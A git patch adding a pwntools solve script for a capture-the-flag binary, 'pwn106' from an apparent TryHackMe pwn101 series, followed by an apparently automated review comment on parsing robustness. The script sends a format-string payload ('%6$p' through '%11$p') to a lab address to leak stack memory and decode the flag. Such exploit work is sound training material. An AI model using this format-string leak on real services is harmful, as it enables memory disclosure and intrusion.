From 3e4988716a4660e60b86a6eb81a87f33c987a958 Mon Sep 17 00:00:00 2001
From: jc
Date: Mon, 28 Oct 2024 21:32:26 +0300
Subject: [PATCH] solve script
---
thm_pwn101/pwn106/a.py | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 thm_pwn101/pwn106/a.py
diff --git a/thm_pwn101/pwn106/a.py b/thm_pwn101/pwn106/a.py
new file mode 100644
index 0000000..0b7067b
--- /dev/null
+++ b/thm_pwn101/pwn106/a.py
@@ -0,0 +1,19 @@
+#!/usr/bin/python3
+
+from pwn import *
+from binascii import unhexlify
+
+context.binary = target = ELF("./pwn106", checksec=False)
+# r = process()
+r = remote("10.10.74.244", 9006)
+
+# funcs
+s = lambda a: r.send(a)
+
+# buf
+s(b"%6$p.%7$p.%8$p.%9$p.%10$p.%11$p")
+r.recvuntil(b"Thanks ")
+out = b"".join([unhexlify(a[2:])[::-1] for a in r.recvS().split(".")]).decode()
+print(out)
+
+r.interactive()
\ No newline at end of file
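Review bot: The parsing on the `out = ...` line assumes every `%p` field comes back as an even-length hex string, so `unhexlify(a[2:])` raises `binascii.Error` whenever a word has a leading zero nibble stripped, and also on the `(nil)` that glibc prints for a zero value or on trailing whitespace in the last field. Filtering and padding first avoids that: `words = [w[2:] for w in r.recvS().strip().split(".") if w.startswith("0x")]` followed by `out = b"".join(unhexlify(w.zfill(len(w) + len(w) % 2))[::-1] for w in words).decode(errors="replace")`. `r.recvS()` also returns only what has arrived so far, so a bounded `r.recvline()` or an explicit timeout would presumably make the read deterministic. The `# buf` comment would be more useful if it said why positions 6 through 11 are the ones read, and the lab address in `remote("10.10.74.244", 9006)` is better taken from `sys.argv` than committed.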